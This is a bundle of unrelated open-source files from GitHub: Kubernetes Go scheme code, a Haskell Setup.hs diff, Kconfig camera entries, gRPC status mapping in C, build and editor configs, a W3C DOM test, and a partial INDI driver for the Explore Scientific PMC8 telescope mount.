/* Copyright 2017 The Kubernetes Authors. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. */ package v1alpha1 import ( metav1 "k8s.io/apimachinery/pkg/apis/meta/v1" "k8s.io/apimachinery/pkg/runtime" "k8s.io/apimachinery/pkg/runtime/schema" ) // GroupName is the group name use in this package const GroupName = "scheduling.k8s.io" // SchemeGroupVersion is group version used to register these objects var SchemeGroupVersion = schema.GroupVersion{Group: GroupName, Version: "v1alpha1"} // Resource takes an unqualified resource and returns a Group qualified GroupResource func Resource(resource string) schema.GroupResource { return SchemeGroupVersion.WithResource(resource).GroupResource() } var ( // TODO: move SchemeBuilder with zz_generated.deepcopy.go to k8s.io/api. // localSchemeBuilder and AddToScheme will stay in k8s.io/kubernetes. SchemeBuilder = runtime.NewSchemeBuilder(addKnownTypes) localSchemeBuilder = &SchemeBuilder AddToScheme = localSchemeBuilder.AddToScheme ) // Adds the list of known types to the given scheme. func addKnownTypes(scheme *runtime.Scheme) error { scheme.AddKnownTypes(SchemeGroupVersion, &PriorityClass{}, &PriorityClassList{}, ) metav1.AddToGroupVersion(scheme, SchemeGroupVersion) return nil }
{ "pile_set_name": "Github" }
--- a/Setup.hs +++ b/Setup.hs @@ -7,7 +7,7 @@ import Data.List (foldl', intersperse, intercalate, nub, lookup, isPrefixOf, isI import Data.Maybe (fromJust) import Distribution.PackageDescription hiding (includeDirs) import qualified Distribution.PackageDescription as PD (includeDirs) -import Distribution.InstalledPackageInfo(installedPackageId, sourcePackageId, includeDirs) +import Distribution.InstalledPackageInfo({-installedPackageId,-} sourcePackageId, includeDirs) import Distribution.Simple import Distribution.Simple.LocalBuildInfo (LocalBuildInfo, localPkgDescr, installedPkgs, withPrograms, buildDir) import Distribution.Simple.PackageIndex(SearchResult (..), searchByName, allPackages )
{ "pile_set_name": "Github" }
config VIDEO_CAFE_CCIC tristate "Marvell 88ALP01 (Cafe) CMOS Camera Controller support" depends on PCI && I2C && VIDEO_V4L2 depends on HAS_DMA select VIDEO_OV7670 select VIDEOBUF2_VMALLOC select VIDEOBUF2_DMA_CONTIG select VIDEOBUF2_DMA_SG ---help--- This is a video4linux2 driver for the Marvell 88ALP01 integrated CMOS camera controller. This is the controller found on first- generation OLPC systems. config VIDEO_MMP_CAMERA tristate "Marvell Armada 610 integrated camera controller support" depends on ARCH_MMP && I2C && VIDEO_V4L2 depends on HAS_DMA && BROKEN select VIDEO_OV7670 select I2C_GPIO select VIDEOBUF2_DMA_SG ---help--- This is a Video4Linux2 driver for the integrated camera controller found on Marvell Armada 610 application processors (and likely beyond). This is the controller found in OLPC XO 1.75 systems.
{ "pile_set_name": "Github" }
/* * * Copyright 2015 gRPC authors. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. * */ #include <grpc/support/port_platform.h> #include "src/core/lib/transport/status_conversion.h" grpc_http2_error_code grpc_status_to_http2_error(grpc_status_code status) { switch (status) { case GRPC_STATUS_OK: return GRPC_HTTP2_NO_ERROR; case GRPC_STATUS_CANCELLED: return GRPC_HTTP2_CANCEL; case GRPC_STATUS_DEADLINE_EXCEEDED: return GRPC_HTTP2_CANCEL; case GRPC_STATUS_RESOURCE_EXHAUSTED: return GRPC_HTTP2_ENHANCE_YOUR_CALM; case GRPC_STATUS_PERMISSION_DENIED: return GRPC_HTTP2_INADEQUATE_SECURITY; case GRPC_STATUS_UNAVAILABLE: return GRPC_HTTP2_REFUSED_STREAM; default: return GRPC_HTTP2_INTERNAL_ERROR; } } grpc_status_code grpc_http2_error_to_grpc_status(grpc_http2_error_code error, grpc_millis deadline) { switch (error) { case GRPC_HTTP2_NO_ERROR: /* should never be received */ return GRPC_STATUS_INTERNAL; case GRPC_HTTP2_CANCEL: /* http2 cancel translates to STATUS_CANCELLED iff deadline hasn't been * exceeded */ return grpc_core::ExecCtx::Get()->Now() > deadline ? GRPC_STATUS_DEADLINE_EXCEEDED : GRPC_STATUS_CANCELLED; case GRPC_HTTP2_ENHANCE_YOUR_CALM: return GRPC_STATUS_RESOURCE_EXHAUSTED; case GRPC_HTTP2_INADEQUATE_SECURITY: return GRPC_STATUS_PERMISSION_DENIED; case GRPC_HTTP2_REFUSED_STREAM: return GRPC_STATUS_UNAVAILABLE; default: return GRPC_STATUS_INTERNAL; } } grpc_status_code grpc_http2_status_to_grpc_status(int status) { switch (status) { /* these HTTP2 status codes are called out explicitly in status.proto */ case 200: return GRPC_STATUS_OK; case 400: return GRPC_STATUS_INVALID_ARGUMENT; case 401: return GRPC_STATUS_UNAUTHENTICATED; case 403: return GRPC_STATUS_PERMISSION_DENIED; case 404: return GRPC_STATUS_NOT_FOUND; case 409: return GRPC_STATUS_ABORTED; case 412: return GRPC_STATUS_FAILED_PRECONDITION; case 429: return GRPC_STATUS_RESOURCE_EXHAUSTED; case 499: return GRPC_STATUS_CANCELLED; case 500: return GRPC_STATUS_UNKNOWN; case 501: return GRPC_STATUS_UNIMPLEMENTED; case 503: return GRPC_STATUS_UNAVAILABLE; case 504: return GRPC_STATUS_DEADLINE_EXCEEDED; /* everything else is unknown */ default: return GRPC_STATUS_UNKNOWN; } } int grpc_status_to_http2_status(grpc_status_code status) { return 200; }
{ "pile_set_name": "Github" }
// This file is part of openCaesar3. // // openCaesar3 is free software: you can redistribute it and/or modify // it under the terms of the GNU General Public License as published by // the Free Software Foundation, either version 3 of the License, or // (at your option) any later version. // // openCaesar3 is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the // GNU General Public License for more details. // // You should have received a copy of the GNU General Public License // along with openCaesar3. If not, see <http://www.gnu.org/licenses/>. #ifndef __OPENCAESAR3_PROTESTOR_H_INCLUDE_ #define __OPENCAESAR3_PROTESTOR_H_INCLUDE_ #include "walker.hpp" class Protestor : public Walker { public: static ProtestorPtr create( CityPtr city ); virtual ~Protestor(); virtual void onNewTile(); virtual void onDestination(); virtual void timeStep(const unsigned long time); void send2City( HousePtr house ); virtual void die(); virtual void save(VariantMap &stream) const; virtual void load(const VariantMap &stream); private: Protestor( CityPtr city ); class Impl; ScopedPtr<Impl> _d; }; #endif//__OPENCAESAR3_PROTESTOR_H_INCLUDE_
{ "pile_set_name": "Github" }
<?xml version="1.0" encoding="utf-8" standalone="yes"?> <rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom"> <channel> <title>Test Engine on ShardingSphere</title> <link>https://shardingsphere.apache.org/document/current/en/features/test-engine/</link> <description>Recent content in Test Engine on ShardingSphere</description> <generator>Hugo -- gohugo.io</generator> <language>en-us</language> <atom:link href="https://shardingsphere.apache.org/document/current/en/features/test-engine/index.xml" rel="self" type="application/rss+xml" /> <item> <title>SQL Case</title> <link>https://shardingsphere.apache.org/document/current/en/features/test-engine/sql-case/</link> <pubDate>Mon, 01 Jan 0001 00:00:00 +0000</pubDate> <guid>https://shardingsphere.apache.org/document/current/en/features/test-engine/sql-case/</guid> <description>Target The code for SQL case is in module sharding-sql-test.There are two targets for this module: Test the wildcard replacement by unit test. Share the SQL resource in resources folder. &amp;lt;sql-cases&amp;gt; &amp;lt;sql-case id=&amp;#34;select_constant_without_table&amp;#34; value=&amp;#34;SELECT 1 as a&amp;#34; /&amp;gt; &amp;lt;sql-case id=&amp;#34;select_with_same_table_name_and_alias&amp;#34; value=&amp;#34;SELECT t_order.* FROM t_order t_order WHERE user_id = ? AND order_id = ?&amp;#34; /&amp;gt; &amp;lt;sql-case id=&amp;#34;select_with_same_table_name_and_alias_column_with_owner&amp;#34; value=&amp;#34;SELECT t_order.order_id,t_order.user_id,status FROM t_order t_order WHERE t_order.user_id = ? AND order_id = ?</description> </item> <item> <title>Integration Test Engine</title> <link>https://shardingsphere.apache.org/document/current/en/features/test-engine/integration-test-engine/</link> <pubDate>Mon, 01 Jan 0001 00:00:00 +0000</pubDate> <guid>https://shardingsphere.apache.org/document/current/en/features/test-engine/integration-test-engine/</guid> <description>Process The Parameterized in JUnit will collect all test data, and pass to test method to assert one by one. The process of handling test data is just like a leaking hourglass: Configuration environment type /shardingsphere-test-suite/src/test/resources/integrate/env.properties /shardingsphere-test-suite/src/test/resources/integrate/env/SQL-TYPE/dataset.xml /shardingsphere-test-suite/src/test/resources/integrate/env/SQL-TYPE/schema.xml test case type /shardingsphere-test-suite/src/test/resources/integrate/cases/SQL-TYPE/SQL-TYPE-integrate-test-cases.xml /shardingsphere-test-suite/src/test/resources/integrate/cases/SQL-TYPE/dataset/FEATURE-TYPE/*.xml sql-case /sharding-sql-test/src/main/resources/sql/sharding/SQL-TYPE/*.xml Environment Configuration Integration test depends on existed database environment, developer need to setup the configuration file for corresponding database to test:</description> </item> <item> <title>SQL Parse Test Engine</title> <link>https://shardingsphere.apache.org/document/current/en/features/test-engine/parse-test-engine/</link> <pubDate>Mon, 01 Jan 0001 00:00:00 +0000</pubDate> <guid>https://shardingsphere.apache.org/document/current/en/features/test-engine/parse-test-engine/</guid> <description>Prepare Data Not like Integration test, SQL parse test does not need a specific database environment, just define the sql to parse, and the assert data: SQL Data As mentioned sql-case-id in Integration test,test-case-id could be shared in different module to test, and the file is at /sharding-sql-test/src/main/resources/sql/sharding/SQL-TYPE/*.xml Parser Assert Data The assert data is at /sharding-core/sharding-core-parse/sharding-core-parse-test/src/test/resources/sharding/SQL-TYPE/*.xml in that xml file, it could assert against the table name, token or sql condition and so on.</description> </item> <item> <title>SQL Rewrite Test Engine</title> <link>https://shardingsphere.apache.org/document/current/en/features/test-engine/rewrite-test-engine/</link> <pubDate>Mon, 01 Jan 0001 00:00:00 +0000</pubDate> <guid>https://shardingsphere.apache.org/document/current/en/features/test-engine/rewrite-test-engine/</guid> <description>Target Facing logic databases and tables cannot be executed directly in actual databases. SQL rewrite is used to rewrite logic SQL into rightly executable ones in actual databases, including two parts, correctness rewrite and optimization rewrite. rewrite tests are for these targets. Test The rewrite tests are in the test folder under sharding-core/sharding-core-rewrite . Followings are the main part for rewrite tests: test engine environment configuration assert data Test engine is the entrance of rewrite tests, just like other test engines, through Junit Parameterized, read every and each data in the xml file under the target test type in test\resources, and then assert by the engine one by one</description> </item> <item> <title>Performance Test</title> <link>https://shardingsphere.apache.org/document/current/en/features/test-engine/performance-test/</link> <pubDate>Mon, 01 Jan 0001 00:00:00 +0000</pubDate> <guid>https://shardingsphere.apache.org/document/current/en/features/test-engine/performance-test/</guid> <description>Target The performance of ShardingSphere-JDBC, ShardingSphere-Proxy and MySQL would be compared here. INSERT &amp;amp; UPDATE &amp;amp; DELETE which regarded as a set of associated operation and SELECT which focus on sharding optimization are used to evaluate performance for the basic scenarios (single route, primary-replica replication &amp;amp; encrypt &amp;amp; sharding, full route). While another set of associated operation, INSERT &amp;amp; SELECT &amp;amp; DELETE, is used to evaluate performance for primary-replica replication. To achieve the result better, these tests are performed with jmeter which based on a certain amount of data with 20 concurrent threads for 30 minutes, and one MySQL has been deployed on one machine, while the scenario of MySQL used for comparison is deployed on one machine with one instance.</description> </item> </channel> </rss>
{ "pile_set_name": "Github" }
{ // Use IntelliSense to learn about possible Node.js debug attributes. // Hover to view descriptions of existing attributes. // For more information, visit: https://go.microsoft.com/fwlink/?linkid=830387 "version": "0.2.0", "configurations": [ { "type": "node", "request": "launch", "name": "Launch Program", "preLaunchTask": "compile", "program": "${workspaceRoot}/node_modules/.bin/_mocha", "args": [ "test/build/test", "--opts", "test/mocha.opts" ], "cwd": "${workspaceRoot}", "outFiles": [ "${workspaceRoot}/dist/**/*.js" ], "sourceMaps": true } ] }
{ "pile_set_name": "Github" }
<?xml version="1.0" encoding="UTF-8"?> <project xmlns="https://maven.apache.org/POM/4.0.0" xmlns:xsi="https://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="https://maven.apache.org/POM/4.0.0 https://maven.apache.org/maven-v4_0_0.xsd"> <modelVersion>4.0.0</modelVersion> <parent> <groupId>org.springframework.boot.ide</groupId> <artifactId>org.springframework.boot.ide.servers</artifactId> <version>4.8.1-SNAPSHOT</version> <relativePath>../pom.xml</relativePath> </parent> <artifactId>org.springframework.tooling.concourse.ls</artifactId> <version>1.23.0-SNAPSHOT</version> <packaging>eclipse-plugin</packaging> <build> <plugins> <plugin> <groupId>org.apache.maven.plugins</groupId> <artifactId>maven-dependency-plugin</artifactId> <version>2.10</version> <executions> <execution> <id>unpack-server</id> <phase>prepare-package</phase> <goals> <goal>unpack</goal> </goals> <configuration> <artifactItems> <artifactItem> <groupId>org.springframework.ide.vscode</groupId> <artifactId>concourse-language-server</artifactId> <version>${project.version}</version> <classifier>exec</classifier> <overWrite>true</overWrite> </artifactItem> </artifactItems> <overWriteReleases>true</overWriteReleases> <overWriteSnapshots>true</overWriteSnapshots> <outputDirectory>${project.build.directory}/../servers/concourse-language-server</outputDirectory> </configuration> </execution> <execution> <id>unpack</id> <phase>prepare-package</phase> <goals> <goal>unpack</goal> </goals> <configuration> <artifactItems> <artifactItem> <groupId>org.springframework.ide.vscode</groupId> <artifactId>concourse-language-server</artifactId> <version>${project.version}</version> <classifier>exec</classifier> <!-- <includes>META-INF/third-party-open-source-licenses*</includes> --> </artifactItem> </artifactItems> <includes>META-INF/third-party-open-source-licenses.txt,META-INF/third-party-open-source-licenses/**.*</includes> <outputDirectory>${project.build.directory}/../</outputDirectory> </configuration> </execution> </executions> </plugin> <plugin> <artifactId>maven-clean-plugin</artifactId> <version>3.1.0</version> <configuration> <filesets> <fileset> <directory>servers</directory> </fileset> </filesets> </configuration> </plugin> </plugins> </build> </project>
{ "pile_set_name": "Github" }
/* This Java source file was generated by test-to-java.xsl and is a derived work from the source document. The source document contained the following notice: Copyright (c) 2001 World Wide Web Consortium, (Massachusetts Institute of Technology, Institut National de Recherche en Informatique et en Automatique, Keio University). All Rights Reserved. This program is distributed under the W3C's Software Intellectual Property License. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See W3C License http://www.w3.org/Consortium/Legal/ for more details. */ package org.w3c.domts.level2.core; import org.w3c.dom.*; import org.w3c.domts.DOMTestCase; import org.w3c.domts.DOMTestDocumentBuilderFactory; /** * The "importNode(importedNode,deep)" method for a * Document should raise NOT_SUPPORTED_ERR DOMException if * the type of node being imported is DocumentType. * * Retrieve document staff.xml and get its type. * Invoke method importNode(importedNode,deep) where importedNode * contains the document type of the staff.xml. * Method should raise NOT_SUPPORT_ERR DOMException. * @author NIST * @author Mary Brady * @see <a href="http://www.w3.org/TR/DOM-Level-2-Core/core#xpointer(id('ID-258A00AF')/constant[@name='NOT_SUPPORTED_ERR'])">http://www.w3.org/TR/DOM-Level-2-Core/core#xpointer(id('ID-258A00AF')/constant[@name='NOT_SUPPORTED_ERR'])</a> * @see <a href="http://www.w3.org/TR/DOM-Level-2-Core/core#Core-Document-importNode">http://www.w3.org/TR/DOM-Level-2-Core/core#Core-Document-importNode</a> * @see <a href="http://www.w3.org/TR/DOM-Level-2-Core/core#xpointer(id('Core-Document-importNode')/raises/exception[@name='DOMException']/descr/p[substring-before(.,':')='NOT_SUPPORTED_ERR'])">http://www.w3.org/TR/DOM-Level-2-Core/core#xpointer(id('Core-Document-importNode')/raises/exception[@name='DOMException']/descr/p[substring-before(.,':')='NOT_SUPPORTED_ERR'])</a> */ public final class importNode16 extends DOMTestCase { /** * Constructor. * @param factory document factory, may not be null * @throws org.w3c.domts.DOMTestIncompatibleException Thrown if test is not compatible with parser configuration */ public importNode16(final DOMTestDocumentBuilderFactory factory) throws org.w3c.domts.DOMTestIncompatibleException { super(factory); // // check if loaded documents are supported for content type // String contentType = getContentType(); preload(contentType, "staffNS", true); preload(contentType, "staffNS", true); } /** * Runs the test case. * @throws Throwable Any uncaught exception causes test to fail */ public void runTest() throws Throwable { Document doc; Document anotherDoc; DocumentType docType; Node node; doc = (Document) load("staffNS", true); anotherDoc = (Document) load("staffNS", true); docType = anotherDoc.getDoctype(); { boolean success = false; try { node = doc.importNode(docType, false); } catch (DOMException ex) { success = (ex.code == DOMException.NOT_SUPPORTED_ERR); } assertTrue("throw_NOT_SUPPORTED_ERR", success); } } /** * Gets URI that identifies the test. * @return uri identifier of test */ public String getTargetURI() { return "http://www.w3.org/2001/DOM-Test-Suite/level2/core/importNode16"; } /** * Runs this test from the command line. * @param args command line arguments */ public static void main(final String[] args) { DOMTestCase.doMain(importNode16.class, args); } }
{ "pile_set_name": "Github" }
// Copyright (c) Microsoft Corporation. All rights reserved. // Licensed under the MIT license. See LICENSE file in the project root for full license information. namespace Microsoft.IIS.Administration.Core { using System.Diagnostics; using System.Reflection; public abstract class BaseModule : IModule { private string _version; public abstract void Start(); public virtual void Stop() { } public virtual string Version { get { if(this._version == null) { this._version = FileVersionInfo.GetVersionInfo(this.GetType().GetTypeInfo().Assembly.Location).ProductVersion; } return this._version; } set { this._version = value; } } } }
{ "pile_set_name": "Github" }
/* INDI Explore Scientific PMC8 driver Copyright (C) 2017 Michael Fulbright Additional contributors: Thomas Olson, Copyright (C) 2019 Karl Rees, Copyright (C) 2019 Based on IEQPro driver. This library is free software; you can redistribute it and/or modify it under the terms of the GNU Lesser General Public License as published by the Free Software Foundation; either version 2.1 of the License, or (at your option) any later version. This library is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more details. You should have received a copy of the GNU Lesser General Public License along with this library; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA */ /* Experimental Mount selector switch G11 vs EXOS2 by Thomas Olson * */ #include "pmc8.h" #include <indicom.h> #include <connectionplugins/connectionserial.h> #include <connectionplugins/connectiontcp.h> #include <libnova/sidereal_time.h> #include <memory> #include <math.h> #include <string.h> /* Simulation Parameters */ #define SLEWRATE 3 /* slew rate, degrees/s */ #define MOUNTINFO_TAB "Mount Info" #define PMC8_DEFAULT_PORT 54372 #define PMC8_DEFAULT_IP_ADDRESS "192.168.47.1" static std::unique_ptr<PMC8> scope(new PMC8()); void ISGetProperties(const char *dev) { scope->ISGetProperties(dev); } void ISNewSwitch(const char *dev, const char *name, ISState *states, char *names[], int num) { scope->ISNewSwitch(dev, name, states, names, num); } void ISNewText(const char *dev, const char *name, char *texts[], char *names[], int num) { scope->ISNewText(dev, name, texts, names, num); } void ISNewNumber(const char *dev, const char *name, double values[], char *names[], int num) { scope->ISNewNumber(dev, name, values, names, num); } void ISNewBLOB(const char *dev, const char *name, int sizes[], int blobsizes[], char *blobs[], char *formats[], char *names[], int n) { INDI_UNUSED(dev); INDI_UNUSED(name); INDI_UNUSED(sizes); INDI_UNUSED(blobsizes); INDI_UNUSED(blobs); INDI_UNUSED(formats); INDI_UNUSED(names); INDI_UNUSED(n); } void ISSnoopDevice(XMLEle *root) { scope->ISSnoopDevice(root); } /* Constructor */ PMC8::PMC8() { currentRA = ln_get_apparent_sidereal_time(ln_get_julian_from_sys()); currentDEC = 90; DBG_SCOPE = INDI::Logger::getInstance().addDebugLevel("Scope Verbose", "SCOPE"); SetTelescopeCapability(TELESCOPE_CAN_PARK | TELESCOPE_CAN_SYNC | TELESCOPE_CAN_GOTO | TELESCOPE_CAN_ABORT | TELESCOPE_HAS_TRACK_MODE | TELESCOPE_CAN_CONTROL_TRACK | TELESCOPE_HAS_TRACK_RATE | TELESCOPE_HAS_LOCATION, 4); setVersion(0, 3); } PMC8::~PMC8() { } const char *PMC8::getDefaultName() { return "PMC8"; } bool PMC8::initProperties() { INDI::Telescope::initProperties(); // My understanding is that all mounts communicate at 115200, so set this early and make it easier for newbies? serialConnection->setDefaultBaudRate(Connection::Serial::B_115200); //TO DO: Figure out how to set default Ethernet address and port (without overriding user config) tcpConnection->setDefaultHost(PMC8_DEFAULT_IP_ADDRESS); tcpConnection->setDefaultPort(PMC8_DEFAULT_PORT); // Mount Type IUFillSwitch(&MountTypeS[MOUNT_G11], "MOUNT_G11", "G11", ISS_OFF); IUFillSwitch(&MountTypeS[MOUNT_EXOS2], "MOUNT_EXOS2", "EXOS2", ISS_OFF); IUFillSwitch(&MountTypeS[MOUNT_iEXOS100], "MOUNT_iEXOS100", "iEXOS100", ISS_OFF); IUFillSwitchVector(&MountTypeSP, MountTypeS, 3, getDeviceName(), "MOUNT_TYPE", "Mount Type", CONNECTION_TAB, IP_RW, ISR_1OFMANY, 0, IPS_IDLE); // No need to guess mount type from device name here, can wait until after we get firmware /*if (strstr(getDeviceName(), "EXOS2")) MountTypeS[MOUNT_EXOS2].s = ISS_ON; else if (strstr(getDeviceName(), "iEXOS100")) MountTypeS[MOUNT_iEXOS100].s = ISS_ON; else MountTypeS[MOUNT_G11].s = ISS_ON;*/ /* Tracking Mode */ AddTrackMode("TRACK_SIDEREAL", "Sidereal", true); AddTrackMode("TRACK_SOLAR", "Solar"); AddTrackMode("TRACK_LUNAR", "Lunar"); AddTrackMode("TRACK_CUSTOM", "Custom"); // Set TrackRate limits within +/- 0.0100 of Sidereal rate // TrackRateN[AXIS_RA].min = TRACKRATE_SIDEREAL - 0.01; // TrackRateN[AXIS_RA].max = TRACKRATE_SIDEREAL + 0.01; // TrackRateN[AXIS_DE].min = -0.01; // TrackRateN[AXIS_DE].max = 0.01; // relabel move speeds strcpy(SlewRateSP.sp[0].label, "4x"); strcpy(SlewRateSP.sp[1].label, "16x"); strcpy(SlewRateSP.sp[2].label, "64x"); strcpy(SlewRateSP.sp[3].label, "256x"); /* How fast do we guide compared to sidereal rate */ IUFillNumber(&GuideRateN[0], "GUIDE_RATE", "x Sidereal", "%g", 0.1, 1.0, 0.1, 0.5); IUFillNumberVector(&GuideRateNP, GuideRateN, 1, getDeviceName(), "GUIDE_RATE", "Guiding Rate", MOTION_TAB, IP_RW, 0, IPS_IDLE); initGuiderProperties(getDeviceName(), MOTION_TAB); TrackState = SCOPE_IDLE; // Driver does not support custom parking yet. SetParkDataType(PARK_NONE); addAuxControls(); set_pmc8_device(getDeviceName()); IUFillText(&FirmwareT[0], "Version", "Version", ""); IUFillTextVector(&FirmwareTP, FirmwareT, 1, getDeviceName(), "Firmware", "Firmware", MAIN_CONTROL_TAB, IP_RO, 0, IPS_IDLE); setDriverInterface(getDriverInterface() | GUIDER_INTERFACE); return true; } bool PMC8::updateProperties() { INDI::Telescope::updateProperties(); if (isConnected()) { defineNumber(&GuideNSNP); defineNumber(&GuideWENP); defineNumber(&GuideRateNP); defineText(&FirmwareTP); // do not support park position deleteProperty(ParkPositionNP.name); deleteProperty(ParkOptionSP.name); getStartupData(); } else { deleteProperty(GuideNSNP.name); deleteProperty(GuideWENP.name); deleteProperty(GuideRateNP.name); deleteProperty(FirmwareTP.name); } return true; } void PMC8::getStartupData() { LOG_DEBUG("Getting firmware data..."); if (get_pmc8_firmware(PortFD, &firmwareInfo)) { const char *c; // FIXME - Need to add code to get firmware data FirmwareTP.s = IPS_OK; c = firmwareInfo.MainBoardFirmware.c_str(); LOGF_INFO("firmware = %s.", c); // not sure if there's really a point to the mount switch anymore if we know the mount from the firmware - perhaps remove as newer firmware becomes standard? // populate mount type switch in interface from firmware if possible if (firmwareInfo.MountType == MOUNT_EXOS2) { MountTypeS[MOUNT_EXOS2].s = ISS_ON; LOG_INFO("Detected mount type as Exos2."); } else if (firmwareInfo.MountType == MOUNT_G11) { MountTypeS[MOUNT_G11].s = ISS_ON; LOG_INFO("Detected mount type as G11."); } else if (firmwareInfo.MountType == MOUNT_iEXOS100) { MountTypeS[MOUNT_iEXOS100].s = ISS_ON; LOG_INFO("Detected mount type as iExos100."); } else { LOG_INFO("Cannot detect mount type--perhaps this is older firmware?"); if (strstr(getDeviceName(), "EXOS2")) { MountTypeS[MOUNT_EXOS2].s = ISS_ON; LOG_INFO("Guessing mount is EXOS2 from device name."); } else if (strstr(getDeviceName(), "iEXOS100")) { MountTypeS[MOUNT_iEXOS100].s = ISS_ON; LOG_INFO("Guessing mount is iEXOS100 from device name."); } else { MountTypeS[MOUNT_G11].s = ISS_ON; LOG_INFO("Guessing mount is G11."); } } MountTypeSP.s = IPS_OK; IDSetSwitch(&MountTypeSP,nullptr); IUSaveText(&FirmwareT[0], c); IDSetText(&FirmwareTP, nullptr); } // PMC8 doesn't store location permanently so read from config and set // Convert to INDI standard longitude (0 to 360 Eastward) double longitude = LocationN[LOCATION_LONGITUDE].value; double latitude = LocationN[LOCATION_LATITUDE].value; // must also keep "low level" aware of position to convert motor counts to RA/DEC set_pmc8_location(latitude, longitude); // seems like best place to put a warning that will be seen in log window of EKOS/etc LOG_INFO("The PMC-Eight driver is in BETA development currently."); LOG_INFO("Be prepared to intervene if something unexpected occurs."); #if 0 // FIXEME - Need to handle southern hemisphere for DEC? double HA = ln_get_apparent_sidereal_time(ln_get_julian_from_sys()); double DEC = 90; // currently only park at motor position (0, 0) if (InitPark()) { // If loading parking data is successful, we just set the default parking values. SetAxis1ParkDefault(HA); SetAxis2ParkDefault(DEC); } else { // Otherwise, we set all parking data to default in case no parking data is found. SetAxis1Park(HA); SetAxis2Park(DEC); SetAxis1ParkDefault(HA); SetAxis2ParkDefault(DEC); } #endif #if 0 // FIXME - Need to implement simulation functionality if (isSimulation()) { if (isParked()) set_sim_system_status(ST_PARKED); else set_sim_system_status(ST_STOPPED); } #endif } bool PMC8::ISNewNumber(const char *dev, const char *name, double values[], char *names[], int n) { if (!strcmp(dev, getDeviceName())) { // FIXME - will add setting guide rate when firmware supports // Guiding Rate if (!strcmp(name, GuideRateNP.name)) { IUUpdateNumber(&GuideRateNP, values, names, n); if (set_pmc8_guide_rate(PortFD, GuideRateN[0].value)) GuideRateNP.s = IPS_OK; else GuideRateNP.s = IPS_ALERT; IDSetNumber(&GuideRateNP, nullptr); return true; } if (!strcmp(name, GuideNSNP.name) || !strcmp(name, GuideWENP.name)) { processGuiderProperties(name, values, names, n); return true; } } return INDI::Telescope::ISNewNumber(dev, name, values, names, n); } void PMC8::ISGetProperties(const char *dev) { INDI::Telescope::ISGetProperties(dev); defineSwitch(&MountTypeSP); } bool PMC8::ISNewSwitch(const char *dev, const char *name, ISState *states, char *names[], int n) { if (dev != nullptr && strcmp(dev, getDeviceName()) == 0) { if (strcmp(name, MountTypeSP.name) == 0) { IUUpdateSwitch(&MountTypeSP, states, names, n); int currentMountIndex = IUFindOnSwitchIndex(&MountTypeSP); LOGF_INFO("Selected mount is %s", MountTypeS[currentMountIndex].label); // Set iEXOS100 baud rate to 115200 // Not sure why we were only doing this for iEXOS100? It's the same for everybody, right? // So I moved this to initProperties() //if (!isConnected()) && currentMountIndex == MOUNT_iEXOS100) // serialConnection->setDefaultBaudRate(Connection::Serial::B_115200); //right now, this lets the user override the parameters for the detected mount. Perhaps we should prevent the user from doing so? set_pmc8_mountParameters(currentMountIndex); MountTypeSP.s = IPS_OK; IDSetSwitch(&MountTypeSP, nullptr); // defineSwitch(&MountTypeSP); return true; } } return INDI::Telescope::ISNewSwitch(dev, name, states, names, n); } bool PMC8::ReadScopeStatus() { bool rc = false; if (isSimulation()) mountSim(); bool slewing = false; switch (TrackState) { case SCOPE_SLEWING: // are we done? // check slew state rc = get_pmc8_is_scope_slewing(PortFD, slewing); if (!rc) { LOG_ERROR("PMC8::ReadScopeStatus() - unable to check slew state"); } else { if (slewing == false) { LOG_INFO("Slew complete, tracking..."); TrackState = SCOPE_TRACKING; if (!SetTrackEnabled(true)) { LOG_ERROR("slew complete - unable to enable tracking"); return false; } if (!SetTrackMode(IUFindOnSwitchIndex(&TrackModeSP))) { LOG_ERROR("slew complete - unable to set track mode"); return false; } } } break; case SCOPE_PARKING: // are we done? // are we done? // check slew state rc = get_pmc8_is_scope_slewing(PortFD, slewing); if (!rc) { LOG_ERROR("PMC8::ReadScopeStatus() - unable to check slew state"); } else { if (slewing == false) { if (stop_pmc8_tracking_motion(PortFD)) LOG_DEBUG("Mount tracking is off."); SetParked(true); saveConfig(true); } } break; default: break; } rc = get_pmc8_coords(PortFD, currentRA, currentDEC); if (rc) NewRaDec(currentRA, currentDEC); return rc; } bool PMC8::Goto(double r, double d) { char RAStr[64] = {0}, DecStr[64] = {0}; targetRA = r; targetDEC = d; fs_sexa(RAStr, targetRA, 2, 3600); fs_sexa(DecStr, targetDEC, 2, 3600); DEBUGF(INDI::Logger::DBG_SESSION, "Slewing to RA: %s - DEC: %s", RAStr, DecStr); if (slew_pmc8(PortFD, r, d) == false) { LOG_ERROR("Failed to slew."); return false; } TrackState = SCOPE_SLEWING; return true; } bool PMC8::Sync(double ra, double dec) { targetRA = ra; targetDEC = dec; char RAStr[64] = {0}, DecStr[64] = {0}; fs_sexa(RAStr, targetRA, 2, 3600); fs_sexa(DecStr, targetDEC, 2, 3600); DEBUGF(INDI::Logger::DBG_SESSION, "Syncing to RA: %s - DEC: %s", RAStr, DecStr); if (sync_pmc8(PortFD, ra, dec) == false) { LOG_ERROR("Failed to sync."); } EqNP.s = IPS_OK; currentRA = ra; currentDEC = dec; NewRaDec(currentRA, currentDEC); return true; } bool PMC8::Abort() { //GUIDE Abort guide operations. if (GuideNSNP.s == IPS_BUSY || GuideWENP.s 